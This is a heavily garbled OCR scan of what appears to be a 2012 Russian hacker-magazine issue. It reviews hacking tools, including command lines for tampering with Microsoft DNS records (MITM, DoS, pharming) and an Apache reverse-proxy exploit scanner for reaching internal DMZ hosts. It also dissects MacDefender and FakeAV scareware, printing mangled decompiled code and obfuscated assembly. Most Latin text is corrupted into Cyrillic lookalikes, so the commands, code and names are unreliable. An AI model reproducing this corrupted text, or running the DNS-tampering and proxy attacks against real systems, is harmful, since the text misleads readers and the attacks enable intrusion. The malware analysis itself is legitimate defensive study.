раскрытие логинов пользователей (ѴРРУ/ 
ЕХРІМ), проверка наличия Ореп Реіау. 

4. Поиск информации об ІР-адресах: имена хо- 
стов, виртуальные хосты (поиске помощью 
Віпд АРІ 2.0), дополнительная инфа изѵѵИоіз 
(ІБР/ЫР), диапазоны ІР-адресов. 

5. Поискинформацииопортах:баннер порта, 
порты для веб. 

Это далеко не всё! Лучший способ познать 
все возможности программы — это попро- 
бовать самому натравить ее на какой-либо 
интересный сайт. 



ЭКСПЛУАТИРУЕМ БАГИ МІСР050РТ 
ОМЗОУИАМІСІІРОАТЕЗ 

По дефолту большинство серверов МісгозоІТ 0І\І5 
прочно интегрированы в сервис Асііѵе йігесіогу, 
позволяющий проводить динамические 
обновления ОЫБ-записей, что уже само по себе 
не является безопасным. Эта фича позволяет 
удаленным юзерам создавать, изменять и 
удалять ОЫБ-записи с помощью определенных 
АРІ-вызовов, например ОпзРерІасеРесогсІБеіА 
или ОпзОиегуА. Программа йпзішп создана как 
раз для эксплуатации этой то ли уязвимости, то 
ли особенности продукта от мелкомягких. 

Здесь можно реализовать несколько сценариев: 

1. МІТМ -атаки. Изменение ОЫБ-записей для 
прокси/ѴѴРй и релея НТТР-запросов. 

2. ОоБспомощьюудаления/изменения крити- 
ческихзаписей. 

3. Фарминг. Похож на МІТМ -атаки, нос протроя- 
ниванием сразу нескольких 0І\І5-записей. 

Если система настроена правильно, тогда 
только овнеру записи будет позволено ее мо- 
дифицировать. Однако этот факт не запрещает 
авторизованным юзерам создавать новые 
записи. Вот примеры работы программы: 

// обновляем и удаляем записи 

сІпзТип.ехе -з 10.0.0.1 -ц \ 

ргоху.тѵсіотаіп.сот -и 5.1.4.77 
сІпз-Рип.ехе -з 10.0.0.1 -сі \ 

-Роо . тусіотаіп . сот 



ПОЛУЧАЕМ ДОСТУП К БМ2-СЕТЯМ 



Не так давно вышла в свет презабавнейшая 
уязвимость в знаменитом сервере АрасЬе 
( ЫЕІѵ/тХРІ Р9. версии 1.3.x <= 1.3.42, 2.0.x <= 
2.0.64, 2.2.x <= 2.2.21), позволявшая атакую- 
щему получить неавторизованный доступ 
к контенту ОМ2-сети. Суть данного бага 
заключалась в том, что апачевский модуль 
тоб_ргоху не совсем корректно взаимодей- 
ствует с определенными правилами тоб_ 
геѵѵгііе, а также с шаблоном РгохуРаззМаІсЬ, 
предназначенным для настройки геѵегзе 
прокси-сервера. В результате эксплуатации 
данной уязвимости атакующий мог отправ- 
лять запросы к серверам из внутренней сетки 
с помощью неправильного ІІРІ, содержащего 
знак 0 в начале. 

Для удобства использования бага ком- 
пания 5ЕСР0РСЕ выпустила специализиро- 
ванную питоновскую утилиту под названием 
АрасЬе Ргоху Бсаппег. Этот скрипт позволяет 
удаленному пользователю получить вну- 
тренние файлы из йМ2. Также тулза может 
быть использована для сканирования портов 
веб-сервера с помощью функционала прокси 
в АрасЬе. 

Пример использования софтины: 

Сканирование портов РМ2-хоста 

рѵііііоп арасііе зсап.ру -г \ 

ѵіѵіѵі . ехатріе . сот -и /іт^/1:е5І:.^і-Р \ 

- сі іпііегп а іІЬ іо з ± . 1 о с а 1 
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Х-Т00І5 




Автор: 

СазаЬа Зесигііу 

цкі_: 

ѵѵеЬзесигіІуІооІ. 

сосіеріех.сот 

Система: 

ѴѴіпсІоѵѵз 



ѴѴАТСНЕР — ПАССИВНЫЙ АНАЛИЗАТОР НТМЬСТРАНИЦ 



Как известно, очень часто поля для 
ввода пользовательских данных под- 
вержены самым различнымуязвимо- 
стям.Существуетмного различных 
сканеров для проведения пентеста 
таких веб-форм. Тулза ѴѴаІсЬег выде- 
ляется на ихфонетем,чтопомаксиму- 
му пытается ненавредитьисследуе- 
мой системе, что, согласись, является 
редкостью в наше время повсеместно- 
гоиспользования грубойсилы. 
Функционал и некоторые особенно- 
сти программы: 

• полная поддержка ѴѴеЬ2.0; 

• анализ в режиме реал-тайм, а 
также продвинутые репорты во 



множестве форматов; 

• поддержка ѵѵі I б сагсі -технологи и 
при сканировании доменов; 

• расширяемый фреймворк (можно 
самому добавлять новые способы 
всевозможных проверок); 

• поддержка 55І_, РІазЬ, БіІѵегІідЫ. 

Для начала работы тебе пона- 
добится РісИІег Шсііегіооі.сот ). 
который должен быть запущен 
перед началом установки ѴѴаІсЬег. 
Затем тебе будет нужно скопировать 
файлы СазаЬаБесигіІу.ѴѴеЬ.ѴѴаІсЬег. 
СЬескз.сІІІ и СазаЬаБесигіІу.ѴѴеЬ. 
ѴѴаІсбег.сІІІ в папку Фиддлера. 





СКАНЕР ВШЕТООТН-УСТРОЙСТВ 




РАСКРЫВАЕМ ИНФОРМАЦИЮ 




СНВ0МЕАМАІ.Ѵ5І5 — БОЛЬШОЙ БРАТ 


НАРАЮ 5САИ 


ВМЕСТЕ С ѴѴНАТѴѴЕВ 


СЛЕДИТ ЗА Т0Б0ЙГ 



НагаІсІ 5сап — это продвинутый сканер раз- 
личных ВІиеІооіЬ-устройств. Данная прога 
легко может определить тащг- и тіпог-класс 
устройства, а также определить производителя 
по МАС-адресу (в комплект программы входит 
большой список известных ВІиеІооіЬ-вендоров). 
Установка и запуск сканера тривиальны: 

• распаковатьархив; 

• за пустить скри пт. /Ьагаісізсап.ру для созда- 
ния базы данных; 

• запуститьскриптужедля непосредственной 
работы ./Ьагаісізсап [опции]. 

Опции скрипта могутбытыакими (отнюдь не 
полный ихсписок): 

• ѵегзіоп — версия программы; 

• б — отобразитьподробныйхелп; 

• ш — сохранить базу в память (по дефолту 
база находится в файле на диске); 

• по-зегѵісе — отключить сканирование на 
неопознанных девайсах; 

• по-мггЕе — отключитьлогирование найден- 
ныхдевайсов; 

• б — сканировать доступные сервисы у на й- 
денныхдевайсов; 

• м ИМЯ_ФАЙЛА — сохранить всю найденную 
информацию в файл. 

Для работы скрипта в никсах нужны пона- 
добятся: РуіЬоп 2.6, РуВІиег, РуБОІЛе. 



ѴѴЬаіѴѴеЬ — это веб-сканер нового поколения, 
умеющий идентифицировать системы управ- 
ления контентом (СМ5), платформы для блогов, 
серверы и многое-многое другое. В процессе 
посещения какого-либо сайта браузер пользо- 
вателя получает массу невидимой информации 
о том, как настроен веб-сервер, с помощью 
какого ПО создавалась страница и так далее. 
Некоторая информация очевидна и может быть 
определена визуально, например по строке 
«РоѵѵегесІ Ьу ХУ2», другая же менее прозрачна. 
ѴѴЬаіѴѴеЬ распознает такие скрытые подсказ- 
ки и сообщает о том, что он сумел найти. На 
данный момент в ѴѴЬаіѴѴеЬ включено множе- 
ство плагинов, способных идентифицировать 
систему по едва различимым признакам, даже 
если была удалена вся компрометирующая 
инфа. Плагины разделяются по методу работы 
на активные и пассивные. Пассивные исполь- 
зуют информацию со страницы и из кукисов. 
Активные сами брутят ІІРІ_'ы. Если не хватает 
функционала, плагины можно дописать самому, 
для этого даже не обязательно знание РиЬу. 

Вот л ишь самые вкусные фичи сканера: 

• более900 плагинов; 

• логи во множестве различных форматов 
[ХМ и ^014, МопдойВ и другие); 

• рекурсивный обход странице помощью 
краулера; 

• поддержка прокси иТОР. 



Если тебя когда-либо интересовало, сколь- 
ко твоей информации собирает и сохраняет 
Соодіе СЬготе, то советую воспользоваться 
замечательной утилитой под названием 
СЬготеАпаІузіз. Предназначена она для 
извлечения и анализа интернет-истории из 
соответствующего браузера. 

Основныефичи программы: 

1. Извлечение истории. Включает в себя 
извлечение закладок, кукисов, загрузок, 
(аѵ-и конок, логинов, наиболее посещаемых 
сайтов, поисковыхзапросов итакдалее. 

2 . Фильтрация данных. Анализ извлеченной 
информации с помощью фильтрации по 
ключевым словам, дате и прочему. 

3. Работа с кешем браузера. Встроенный 
просмотрщи к картинок, сохраненных в 
кеше. Также могутбыть просмотрены веб- 
странички и другие файлы, которыеудастся 
извлечь. 

4 . Тай мл айн веб-истории. Просмотр посеще- 
ний различных сайтов в видетаймлайна. 

5 . Генерация отчетов. Возможностьсоздания 
продвинутых отчетов со всей найденной 
информацией в форматах НТМЕ, СБѴиХМЕ. 

6. Реконструкция веб-страниц. Полное вос- 
создание за кешированных страниц, кото- 
рые будут отображаться так, как их увидел 
пользователь при посещении. 
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МАІ_ѴѴАКЕ 



Вячеслав Закоржевский 




Громим 

фейковые 

антивирусы 



ПОСМОТРИМ, ЧТО ВНУТРИ У РАКЕАѴ ПОД МАС И РС 



Основная задача фейковых антивирусов — 
пугать пользователя несуществующими 
угрозами и вымогать деньги за якобы лечение 
якобы выявленных ими угроз. На всяких 
сомнительных сайтах, содержащих іпаррго- 
ргіаіе сопіепі, ты наверняка не раз с ними 
сталкивался. А как они написаны? Насколько 
прямые руки у их авторов? Да и вообще, 
сколько классов средней школы окончили 
творцы подобного ПО? Попробуем разобраться. 

п ^ п ■ і*гви^ 

- * а і-г к О фт о, 




Рис. І.ЗначокЗащитника Макинтоша 



ачнем нашу сегодняшнюю экзекуцию с известнейшего 
фальшивого антивируса под Мае — МасйеІ'епсІег. Он 
появился в середине 2011 года и наделал достаточно 
много шума, поскольку это была первая программа такого клас- 
са не под ѴѴіпсІоѵѵз. 

Для тестирования зловреда я использовал образ Мае 05 под 
ѴМѵѵаге. У меня на руках есть только исходный архив — попро- 
бую разобрать его максимально подробно. После того как я запу- 
стил архив и операционная система его распаковала, передо 
мной появился значок приложения Масйеіюпсіег (рис. 1). 

Когда я запустил само приложение, операционная система 
любезно сообщила, что файл был скачан из интернета и может 
представлять опасность (рис. 2). 

Смело игнорируем предупреждение (пользователю Мае 
нечего бояться!), и зловред успешно запускается. И сразу же 
приступает к работе — посмотри, как ловко он «просканировал» 
компьютер и обнаружил несколько «угроз» (рис. 3). 

Из названий становится очевидно, что нашел он не угрозы, 
а совершенно обычные и адекватные приложения для Мас'а. 
Иначе говоря, в дело идет обычное запугивание пользователей. 
При попытке вылечить систему от «вирусов» пользователю 
предлагается активировать приложение — естественно, не за- 
бесплатно (рис. 4). 

Страница мерчанта, через которую должен выполняться пла- 
теж, увы, уже недоступна, поэтому точную цену назвать не могу, 
однако обычно для фальшивых антивирусов она колеблется 
в районе 80-130 долларов. 



РАСКОВЫРЯЕМ ЭТО 



Теперь, когда нам понятен принцип работы этого зловреда, 
можно приступить к разбору «внутренностей». Все начинается 
с архива АгсЬіѵе.рах, который представляет собой обычный 
С РІО -архи в и может быть успешно распакован с помощью 7-2ір'а 
(рис. 5). 
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Громим фейковые антивирусы 



После распаковки становится явной структура папок: 
«МасОе^епсІег.арр -> Сопіепіз -> МасОБ, Резоигсез». В папке 
«Сопіепіз», помимо двух других папок, содержатся два кон- 
фигурационных файла, не представляющих интереса. Папка 
«Резоигсез», как можно понять из названия, содержит ресурс- 
ные данные. Здесь можно обнаружить все картинки интерфейса, 
звуки, шрифты и строки. 

"БЕаЕизІпЕесЕесІТехЕ" = "ЦпЕогЕипаЕеІѵ. ѵоиг сошриііег із 
іпЕесЕесІ. Сіеап ир уоиг зѵзііет гі§бЕ пом"; 
"БЕаЕизІІпкпомпТехЕ " = " ІЕ'з бі§б1у гесоттепсіесі Ео зЕагЕ 
зсаппіп§ аз циіскіу аз роззіЬІе./Г; 

"БЕаЕизОкТехЕ" = "Ооп-’Е Еог§еЕ Ео зсап уоиг зузЕегп Егот 
Еі те Ео Еіте . " ; 



"БЕаЕизБЕаЕизІпЕесЕесІ" = "АЕ Кізк"; 
"БЕаЕизБЕаЕизІІпкпомп " = " ІІпкпомп "; 
"БЕаЕизБЕаЕизОк " = "Сіеаг"; 



// Бсаппіп^ агеа 

"БА ІпМетогѵРгосеззез" = "Іп Метогѵ Аррз: 
"БАРізкРгосеззез" = "Рііез БузЕет: 
"БАНізЕогѵ" = "Бизрісіоиз оЬ^есЕз: 



// Биссезз Ке^ізЕег Мезза^е Ьох 

"5КМ_ТіЕ1е" = "Уоиг сору оЕ МАС РеЕепсІег із ге§ізЕегесІ 
пом. 

"5КМ Мезза^е" = "Соп^гаЕиІаЕіопз ! ІМом уои баѵе ап аЫИЕу 
поЕ опіѵ Ео ЕпсІ ѵігизез. ЬиЕ аізо Ео таке а Еиіі 



зузЕет сіеапир. ІЕ із бі§б1у гесоттепсіесі Ео сіо а сіеапир 
аз диіскіу аз роззіЫе.” ; 



// 1лІагпіп%! СапЕ сіеапир - поЕ ге^ізЕегес! зоЕЕ 
"БТКТіЕІе" = " ІІпге^ізЕегесІ сору"; 

"БТКМезза^е" = "Тбе сору оЕ уоиг апЕіѵігиз із поЕ 
ге§ізЕегесІ. Ке§ізЕег Ео баѵе ап аЬіІіЕу Ео сіо а Еиіі 
сіеапир оЕ уоиг зузЕет. "; 



// Ке^ізЕег 5ЕаЕиз іп СопЕгоІ СепЕег 

"К5_5ЕаЕи5_Ке§" = ^'Ке^ізЕегесГ^ 

"КБ_5ЕаЕиз_ІІпге§"^^_"ІІпге§І5ЕегесГ; 

"КББЕаЕизКе^ТехЕБбогЕ" = "Тбе рго^гат із 

ге^ізЕегесІ апсі Ебе Іісепзе мііі пеѵег ехріге." ; 

"КБ БЕаЕиз Ке^ТехЕІ-Оп^" = "ТІіе рго^гат із ге^ізЕегес! 

апсі ЕІіе Іісепзе мііі пеѵег ехріге. Роп'Е Еог^еЕ Ео сііеск 

ирсІаЕез Ео баѵе ап ир-Ео-сІаЕе ѵігизез сІаЕаЬазе.^І 

"К5_СС_5ЕаЕиз_ІІпге§ТехЕ" = "Уои сап^Е сІеІеЕе ѵігизез. 
Ке§ізЕег Ео Ье аЫе Ео СІеІеЕ е ѵігизез."; 
"К5_5І_5ЕаЕиз_ІІпге§ТехЕ" = "Уои баѵе ап ипге&ізЕегесІ 
рго^гат міЕб гесіисесі ЕипсЕіопаІіЕѵ. " ; 



// С1еапіп% ир Ебе зузЕет 

"СІІБ ТіЕІе" = "БузЕет сіеапир . . . " ; 

"СІІБ РгеЕх" = "ТгеаЕіп^; "; 

В оставшейся папке «МасОБ» содержится непосредственно 
файл приложения — «МасОеі'епсІег». Но на самом деле это за- 
грузчик, который в зависимости от разрядности операционной 






■МісіВіГі-пАіг» - >» прогрі цкіі, обь-ккт Выл ]ігѵѵм*іі на 
№іі«рниіі Вы дсісгштілыл мт» открыть ігеі йВьсніІ 

Г ГЪЬЕШііісй-п|ЦйШ^ х Г Сгамишть \ ( Оіщмік ^ 



Рис. 2. Как говорит Капитан Очевидность, файлы из интернета могут быть полезны, но они 
же могут и навредить! 




Рис. 3. Найденная куча проблему опытного пользователя может вызвать лишь улыбку 




Рис. 4. Заплати и лечись! 




Рис. 5. Посмотрим, что там в этом архиве... 
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МАШАКЕ 



системы запустит либо 32-, либо 64-битное приложение. 

Я открыл в ЮА'е 32-битную версию Масйеіюпсіег'а и присту- 
пил к анализу. Сразу же было обнаружено несколько любо- 
пытных функций. Например, функция с говорящим названием 
«АпІіѴіги5_5саппіпдРгосе555іагІесІ». Ее код в Нех-Рауз: 



ѵоісі * ссіес! _Ап1:іѴіги5 = 5саппіп§Ргосе5551:аг1:есІ_( 
ѵоісі *а1. 



іпі а2) 


{ 


зіепесі 


іпі і: 


// еЬх@1 






ѴОІСІ * 


ѵ4 : // 


еах(Э4 






іпі ѵ5 


: // Гзо+061 ГЬо-286101 








б ѴігзСоипІ = 


(іпі)оЬіс тзе5епсІ( 






аі , 


(сопзі 


зее *) "СеіКпсПМит: : 


", 9, 


15); 


з аггОеІауВеімеепѴігзРоипсІ Г01 = (іпі)оЬіс тзд5епсІ( 


аі. 


( СОПЗІ 


зее *) "СеіКпсПМит: : 


". 10, 


15); 


СІЫОГСІ_ 


13084 = 


(іпі)оЬдс тз§5епсІ( 






аі. 


( СОПЗІ 


зее *) "6еіКпсІІ\Іит: : 


", 25, 


35); 


СІЫОГСІ 


13088 = 


( іпі)оЬіс тз^БепсК 






аі. 


(сопзі 


зее *) "беіКпсІІМит: : 


", 35, 


45 ); 


СІЫОПСІ 


1308С = 


(іпі)оЬзс_тз§БепсІ( 






аі. 


( СОПЗІ 


зее *) "СеіКпсІІ\Іит: : 


", 60, 


90): 




■Рог ( 


і = 4: 


і < з ѴігзСоипІ:: ++і 


) 




з аггРеІаѵВеііл/еепѴігзРоипсІГ іі = 






(іпі)оЬіс тзд5епсІ(а1, 




( сопзі 


зее *) "беіКпсІІМит: : 1 


110. 


160): 



*(_гіоиЬ1е_*)о-р-Р_12Р60 = СРАЬзо1и1:еТітеСе1:Сиггеп1:(ѵ5) ; 



ѵ4 = оЬдс_тз§5епсІ( "Нізіогѵ" . 

(сопзі: зе§ *) "зЬагесІНізіогу " ) ; 



з_СигѴігРіпс!іп§ = (іпі:)о Ь ]с ^тз^БепсІ (ѵ4, 

(сопзі зе§ *)"§еі5и5рісіои5Рі1е5Спі"); 



геіигп оЬіс тзеЗепсКаІ, (сопбі: зе е *) 

"зеіТітеІпіегѵа1РогРігзіѴігАрреагіп§") ; 

} 

По коду видно, что количество найденных вирусов (з_ 
ѴігзСоипІ) — случайное число. Аналогично определяется время 
между нахождением вирусов и другие переменные. (Да, если 
у тебя все еще осталась вера в прекрасное и ощущение, что это 
не мошенническое ПО, самое время с ним — сощущением — 
расстаться.) Большинство других функций не особо интересны 
и занимаются рисованием анимации, всплывающих окон и про- 
чими вспомогательными вещами (рис. 6). 

Среди строчек можно обнаружить адреса страниц оплаты, 
по которым происходит обращение. А если кому-то захочется 
активировать Масйе^епсіег, то в строках можно найти ключи 
активации (рис. 7). А что, неплохо звучит: спиратить требующее 
денег вредоносное ПО! На этом всё. Поделье под Мае оказалось 
очень простым и не содержащим интересных технических реше- 
ний. Никаких средств защиты, затрудняющих анализ, здесь не 
было обнаружено, поэтому провести разбор, даже детальный, не 
составляет труда. 



Гипгііоі^ ■•■•лгі^гач □ X 

^ РіпсЬоп пата ^ 

Ѵ і НІЁІоту_&егі5 

Ѵ г иБрісіоУ5раск?_ 

"V НіяНску^ігй^ 

^К| __ I * *псМ 1.1 о діпСог ^ г сЛ§т_.ар рУ Р 

'і иам^с!тАСсідіпСосіІгоівг_^и#ѵг»^^ 

\ I .щгісЬАгі^с діпСсму г г_ з с •: пс НАи. сгьс»ЫссІ 

Ьаѵгіс К^іодігуСосиг о*сг_і«ЙП-^^ Мли 

"V М ^і^і>^ в (ЪагдвСііг5 ыгАпѵтіЫ игггЬ«_ 

„ М лл-і\і/гг^_Р гіісилі Т (Ммы_ 

% Мш\^і^_СеіТййШаІіе^а№ВуТаз 

\ _ М I р^АпітКІ да І : сюгііРс^ Сіе-а 

М п [^_ I С 5 о^л_ 

М <5*тУ/Гк1_0 пСЬесЬ Г-1 е ѵ-№* у #плгкЯ4 оі ЙвдЁ іоп_ 

М=ввпѴ^пеІ_0 пСЬкк5сапГті?Ьеі_ 

М^^п^ОпОреііРаэеІтівго 

'г М-«гіЧѵ г гн^_0 пТ ісАгіпТ мтня_ 

% г М^^п(^ОпТккС^скТіпа_ 

V _МайГі^Гі^_5 сагіпрб ш\ъй_ » 



Рис. 6. Прочие функции МасОеіепсІег 



\ 

_«ну(і 

_5»ішч и 

_Мпдй 

СТ*П|(І 

окп|(| 

_С^ичв 

_(йЬчЬ. 

(ТЬр?(1 



т ^і т 



ОВКШ С № 




ІІИІДЯ^ 



Рис. 7. Особый цинизм — ключи регистрации для фейковогоавера! 



ргтаар" " '* 11 - 1 ,1 

^ Р*чі 







л 1 -* * 

■_«г* Ч 1 1 1 ■ и М»Нв> 



О 1 1 ■!«! 

9 л Р Ці ц ьътчг 

■О 'ига чмтчот* чнгвіыѵі н ій* 

* Ьш+г+тьщ рнь А* 

О I И*| Ц І Н | |0 ^| > і м і ■— 

Л ЦНіи фМк наглым 
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I «і»— І | 



Рис. 8. Порождение больной фантазии авторов — жесткий диск не читается, плохо 
вращается, а оперативная память мощно перегревается 
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Громим фейковые антивирусы 




Рис. 9. Назойливое окошко РакеАѴ достает пользователя 




Рис. 10. Ненастоящий антивирус рисует окошко с липовым ІЕ и пытается украсть 
у нас настоящую карточку 




Рис. 11. Большое количество графических файлов, образующее интерфейс этого... 
эээ... антивируса 



РАКЕАѴ, НО ДЛЯ РС 



Разберем РакеАѴ под царя царей всех платформ — РС (если 
что, панегирики в адрес РС добавил редактор, Вячеслав не 
виноват, не бейте его! — Прим. ред.). Сам зловред состоит из 
одного файла «І_ТѴѴт4а2ІЬ5ідс.ехе». Никакой россыпи ресур- 
сов в отдельных файлах, исполняемых модулей под разные 
платформы и прочих вещей, присутствовавших в версии под 
Мае, здесь нет. 

Итак, фальшивый антивирус после запуска самоудаляется из 



исходной директории и копируется в % а р р сі а 1; а % . После переза- 


884РР4 


тоѵ 


грузки он начинает интенсивно «сканировать» систему и нахо- 


0РВР4510 


тоѵзх 


дит кучу угроз. Только в данном случае идетупор не на вирусы 
и трояны, а на целостность «железа» (рис. 8). 

Невооруженным глазом видна абсурдность найденных 


0РВР4Р08 


тоѵзх 


23С1 


апсі 


8845Р4 


тоѵ 



«угроз». Естественно — чтобы вылечить систему, надо купить 
полную версию 5узІет сЬеск. Мало того что этот зловред и так 
находит кучу ошибок, он еще и не оставляет жертву в покое, по- 
казывая дополнительные всплывающие окна (рис. 9). 

Если попытаться купить это убожество, то откроется окно — 
внешне оно очень сильно напоминает окно ІЕ, но на самом деле 
им не является. Грамотно прорисован «замок» и зеленый фон 
в адресной строке, означающий, что установлено корректное 
551-соединение (рис. 10). 

Разумеется, в этом случае не может быть и речи о том, что 
данные о банковской карте останутся в безопасности. Сам 
файл, конечно же, защищен криптором. Однако по точке входа 
располагается стандартный рантайм МісгозоІТ ѴізиаІ 5іисІіо, 
если в настройках указать сборку консольного приложения. 
По-видимому, это сделано для того, чтобы файл выглядел более 
«нормально». А в коде таіп'а располагается несколько антиан- 
ти вирусных трюков на основе АРІ- функций: 



ризіі 



еЬр 



тоѵ 

зиЬ 

ризіі 

ризіі 

ризіі 

ризіі 



еЬр, езр 
езр.,010 

0 

0 

0 



саіі 



МкРагзеРізрІауІМате 



тоѵ 



[еЬр][-00С],еах 



стр сІ,[еЬр][-ѲѲС], 080070057 



ІП2 .000401856 



Весь код подвергнут неслабой обфускации: применяется 
большое количество перебросов между регистрами и памятью 
и бессмысленных логических/арифметических операций: 

ЗРСАѲѲѲѲѲѲ стр еах.ѲѲѲѲѲѲѲСА 

750Р ІП2 . 000402А8С 

0РВЕ4Р0С тоѵзх есх, Ь, [еЬр] [00С] 



0РВЕ55Р4 



тоѵзх 



есІх, Ъ, [еЬр] [ -00С] 



0ВСА 



есх, есіх 



[еЬр] [-0ѲС] , сі 
еах.ѵѵ. [еЬр] [010] 

есх,м, [еЬр] [8] 

еах. есх 
[еЬр] [ -00С] , аі 



С745Р89С000000 тоѵ 



0РВР5510 

8В45Р8 

03С2 

8945Р8 

ѲРВР4Р10 



тоѵзх 

тоѵ 

асісі 

тоѵ 

тоѵзх 



СІ , [еЬ р ] [-8] .00000 009С 
есІх,м,, [еЬр] [010] 

еах, [ еЬр] [ -8] 

еах, есіх 

[еЬр] [-8].,еах 

есх,ы, [еЬр] [010] 



8В55Р8 



тоѵ 



есІх^ДеЬр] [ -8] 



2ВР1 зиЬ 

89 55Р8 тоѵ 

66С7Ѳ5Е8Р7 4 С0ѲѲСѲ0 тоѵ 
ѲРВР4508 тоѵзх 
83Р879 стр 



есіх, есх 

[ еЬр ] [ -8] , есіх 

ѵѵ, [0004СР7Е8] ,0000С 

еах.ѵѵ, [еЬр] [8] 
еах, 079 : 1 у 1 



7417 



3 ? 



. 000402АЕ1 



Радует, что без проблем удалось сдампить этот зловред 
и посмотреть на «чистое» содержимое файла. В нем оказалось 
аж 133 РІМС'шки и одна СІР'ка. В этих изображениях содержится 
весь интерфейс зловреда (рис. 11). 

Таков он, РакеАѴ под винду. Сразу видно, что у писишных 
вирмейкеров больше опыта за плечами, — в коде явно заметны 
попытки защититься от исследования. 



ЗАКЛЮЧЕНИЕ 



Разобранные нами примерчики вовсе не казуистика — такие 
программы очень распространены сейчас в США и Западной Ев- 
ропе. Все они предлагают жертвам оплату с помощью пластико- 
вых карт. Оно и понятно: у большинства жителей этих регионов 
есть карты и люди умеют ими расплачиваться. К тому же многие 
не сочтут это за обман и не пойдут ни в банк, ни в полицию, что, 
конечно же, на руку мошенникам. ПЕ 
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Ргеѵіеѵѵ 



кодинг 
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ЧЕРНЫЕДЫРЫ ПОД БЕЛЫМИ ПЯТНАМИ 

Увлекательное рассуждение автора о 
том, что производители материнских 
плати процессоров играют в 
нечестную игру, ограничивая доступ 
к своей документации. Если принять 
некоторые допущения, получается, что 
существующий механизм обновления 
микрокода позволяетфактически 
подправитьалгоритм работы любой 
команды процессора. Аэто не 
документированные нигде функции, 
которые могут делать чтоугодно! Что 
это — просто мыслиавтора или и правда 
теория заговора? Предлагаем тебе 
решитьсамому. 




КОДИНГ 



1ЛІІХОЮ 
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РНР-ПРОТЕКТОР 




ЛИПОСАКЦИЯ ДЛЯ ПИНГВИНА 




Последнее слово в разработке плагинов 
для РНР — это2епсІ-экстеншены. Раз- 


104 


Можно л и заставить І_іпих работать на 
самых доисторических и низкопроизво- 


110 



бираемсясними на практике: пишем свой 
протектор РНР-файлов. 



дительныхсистемах? Да, если избавить 
тукса от лишнего жира. 



НАЗЛО РЕКОРДАМ 

Изумительныедостижения всфере 
свободного программного обеспечения, о 
которых рассказывают друзьям, ретвитят 
и ставят по тысяче «лайков». 




5УЫ/АСК 




СЦЕНА 
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ОБЛАЧНЫЙ СЛОН 

Для построения кластеровтакие гиганты, 
как РасеЬоок и ѴаЬоо, используют мощ- 
нейший инструмент Насіоор. Попробуем и 
мы собрать свой собственный кластер. 



124 



СЕТЕВЫЕ НАБЛЮДАТЕЛИ 

Еслиутебя паркиз несколькихдесятков 
компьютеров и сетевыхустройств,то без 
удобного средства мониторинга не обой- 
тись. Но какое решение выбрать? 



130 



МИРКАТИТСЯ ВЗОРА 

Это статья-размышление об интеллек- 
туальной собственности, копирастахи 
законопроектах РІРА и 50 РА, которые 
могут сильно изменить наш мир. 
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ОібйаІРІісЛоЗсИооІ «ЯР» 

Онлайн- фотокурс Бщііаі РЪоіо ЗсЬооІ 




Новый формат, 
новые возможности 



ЗТгт 



[На протяжении девяти лет журнал РідйаІ РНоІо рассказывал читателям о том, что | 
ітакое фотография вообще и что такое хорошая фотография в частности; как сдѳ-| 
|лать фотографию своим хобби или профессией; знакомил с творчеством лучших | 
[отечественных и зарубежных фотографов. Они же, в свою очередь, делились | 
[практическими навыками и опытом пути от первого нажатия на кнопку затвора до] 
организации персональных выставок и создания фотоальбомов. Теперь, благодаря 
поддержке компании Затзипд, журнал запускает новый формат взаимодействия с 
(■(фотолюбителями — образовательные онлайн-курсы Оідііаі РЬоІо Зсііооі.і 



Это бесплатный интерактивный интернет- 
курс, подготовленный экспертами журнала 
и фотографами-профессионалами, пройдя 
который вы сможете ознакомиться с раз- 
личными техническими аспектами фотогра- 
фии и получить необходимые навыки рабо- 
ты в разных жанрах. Кроме этого, в рамках 
курса вы сможете узнать о преимуществах 
системных компактных камер на примере 
фототехники линейки Заіпзип^ ЫХ. 

Учебный курс разделен на 16 уроков с 
видеороликами, статьями и примерами 
фотографий, а так же заданиями для само- 
стоятельной работы. Победители конкур- 
са, проходившего в мае этого года на сайте 
сіщііаІ-рЬоІо.т/зсйооІ/ смогут работать 
непосредственно с преподавателями курса, 
получать консультации по учебной про- 
грамме и экспертную оценку своих фото- 
графий. Впрочем, это не значит, что те, 



кто не успел подать заявки на обучение, 
не смогут найти для себя ничего полезного 
на сайте проекта. Уроки и статьи будут до- 
ступны всем посетителям сайта. 

Дополнительная программа курса вклю- 
чает в себя мастер-классы известных фото- 
графов, работающих в различных жанрах. 
Мастер-классы будут проходить в Москве, 
и всем желающим предоставляется воз- 
можность прослушать интересную лекцию, 
поучаствовать в портфолио -ревю, а также 
поближе познакомиться с фототехникой 
5агп5ип§ и пообщаться с техническим спе- 
циалистом компании. Для тех же, кто не 
сможет посетить эти мероприятия, будут 
подготовлены видеозаписи мастер-классов, 
которые можно будет найти на сайте Біщіаі 
РЬоІо ЗсЬооІ. Кроме этого, эти видеозапи- 
си будут регулярно размещаться на БѴБ- 
приложении к журналу Бщііаі РЬоіо. 



По завершении курса Бщііаі РЬоІо ЗсЬооІ 
в феврале 2013 года в одной из централь- 
ных московских галерей пройдет группо- 
вая выставка, на которой будут представ- 
лены 50 лучших фоторабот слушателей 
курса. 

Все учебные материалы курса Оідііаі 
РЬоІо ЗсЬооІ подготовлены на базе си- 
стемной камеры 5аівдип§ №200. На 
ее примере мы будем рассказывать о 
технике фотосъемки. Система 5аівдип§ 
Ж включает в себя все компоненты, 
необходимые для организации твор- 
ческого процесса и работы фотографа 
в большинстве направлений и жанров. 
При всем этом камера ЫХ200 идеаль- 
но подходит для любительского ис- 
пользования благодаря доступности в 
управлении, легкости и компактности. 



График работы Оідііаі Рііоіо 5сЬоо1 
Учебный курс (8 месяцев) 02.06.2012 — 15.01.2013 
7 мастер-классов 23.06.2012 — 15.12.2012 
Выставка лучших работ учащихся февраль 2013 
ОІСІТАГ-РНОТО.ІШ/ЗСНООЬ/ 



Реклама 











МИКРОКОД В ПРОЦЕССОРАХ 
И ТЕОРИЯ ЗАГОВОРА 



Современные программисты, даже самого высокого уровня, плохо 
представляют реальную работу вычислительной системы. Да, где- 
то там бегают битики, байтики, какие-то триггеры и прочая «муть» 
переключается, но все это от них далеко. Нынче программируют 
информационные объекты, а не конкретные кусочки кремния. 



рограммирование на ассемблере ста- 
ло редкостью, кто-то даже считает, что 
это умерший язык, и смотрит на него 
снисходительно. Зря: настоящие программи- 
сты, которые программируют, а не пишут некий 
абстрактный текст, всегда знают, что стоит за 
каждой строчкой исходника и как это будет 
работать в кремнии. 



Для подавляющего большинства людей, 
считающих себя программистами, процес- 
сор — это некий фантомный объект с услов- 
ными характеристиками и свойствами, среди 
